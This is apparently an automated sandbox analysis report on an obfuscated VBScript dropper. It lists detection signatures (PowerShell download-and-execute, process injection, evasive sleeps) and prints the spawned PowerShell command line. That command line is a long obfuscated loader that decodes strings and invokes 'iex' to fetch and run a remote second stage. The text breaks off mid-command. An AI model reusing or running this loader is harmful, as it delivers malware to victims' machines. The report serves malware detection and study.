Edit tour
Windows
Analysis Report
Scripts_Obfusque.vbs
Overview
General Information
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected Powershell download and execute
AI detected suspicious sample
Obfuscated command line found
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Suspicious Scan Loop Network
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Classification
- System is w10x64
- wscript.exe (PID: 6764 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\Scrip ts_Obfusqu e.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) - powershell.exe (PID: 6852 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" "cls;write 'Anethole s Klosette rnes Venus haar Paral alia Unytt igst Stokk emetoder S canted129 Loftrum243 Nondissip atedly Sma shendes Sa mmenlignin gs Areogra pher Artic ulant Pros sies Vesic ulating Su permishap Adolfine P rostyle Ex erted Tors ken Vespoi d Svejsere Frotteers Kvrulante r Anethole s Klosette rnes Venus haar Paral alia Unytt igst Stokk emetoder S canted129 Loftrum243 Nondissip atedly Sma shendes Sa mmenlignin gs Areogra pher Artic ulant Pros sies Vesic ulating Su permishap Adolfine P rostyle Ex erted Tors ken Vespoi d Svejsere Frotteers Kvrulante r';If (${h ost}.Curre ntCulture) {$Belliss erne++;}Fu nction gaa rdspladsen s($Agerend es){$Dafte r135=$Ager endes.Leng th-$Bellis serne;$Unb urden='SUB sTRI';$Unb urden+='ng ';For( $Un minimizing =5;$Unmini mizing -lt $Dafter13 5;$Unminim izing+=6){ $Anetholes +=$Agerend es.$Unburd en.Invoke( $Unminimi zing, $Bel lisserne); }$Anethole s;}functio n sanktion jtr($Epigy ne){ . ($Emancipe ringerne) ($Epigyne) ;}$Forlnge lsers=gaar dspladsens 'Ol erMTy vekoDi.elz Coenoi Fro nl Heldl.n fusaNatro/ E.cam5Unbr i.Avlsh0Ko ord Fo.b(P o.omW Acce iFravrnAme ntd UnpuoR ealkw Zoon sMyxom .ej sN .hudTRe cor Unend1 Turne0,npo w.Zymoc0Da cty;Predo F,skeWanti piSeptinGu ,gn6Kundg4 Brn,b;Coll a Overixfo rsy6Af ta4 Malt;Fo.e w LawserPr epov Kom,: Barnl1for e2Incom1To m,t.te,eo0 Alloc)B.yt k Vill,G S kyte Retrc kldnk Mav eoChili/L. tre2Redis0 Nazil1Tlin g0C rci0Zi tta1Trkas0 Nonco1 Slu SelecFM.s saiSkyd rS i ine ampf .ostochev ixDemob/tr odd1und.r2 Ser m1Earm u.Stra,0Ex agg ';$Fan gstknivens =gaardspla dsens 'Imp arUPremosa romaeBalla r Unfr-Lec t,APliengR ipo,e Exce nRubritDef in ';$Unyt tigst=gaar dspladsens 'Afvrgh D anstAllest H.stepKomm esbevi,: K .nt/Dosme/ forgwIter .wPal mwNe ur..Housla VagarlC cc ymKlovnr H emawAnnela Skjerd.ndt a. SvrvcUn kinoSultam pimps/,tam mwparanh S kva/Sp.ckS Unin,uLo h ibOrgieoSt orkrSamtad OptrniTap. lnResuneCo mmerPaxone ,hapenGowl kdPingeeRo kkes,usti7 Affld8Unem ..,eadmsUn harmde eni V,nre>Micr ohForlotSt eretKniplp KonklsTill g:Lingu/Re ngr/ Dimyw SusiwBreg .w,onst. S amle Domsr GgepupArgu i-appelrn, rmaoOpryky Ethea Akk rlGarvk-Pr otoc kandr No.atoFe t swfejlmnMe sop. Decai Embaln irk efResteoAn h l/ Cifrw ChanchAtta k/,adioS A laru.ountb IndlsoPara prpian.d S crai Thorn S.ptieFin. irK ntaeCh antnVegetd FingeI,gl osGuden7 B ekr8abrik. ,ydrosKri sm lddeiM. tte ';$Dea ktiverende =gaardspla dsens 'pan or> atol ' ;$Emancipe ringerne=g aardsplads ens 'Bru.h iBlideeRut ,exFyl e ' ;$Almengjo rdes='Loft rum243';$C ometlike = gaardspla dsens ' H lvequ,drcR espohsura, oSniff Tes er%Subcha Klunpkun.t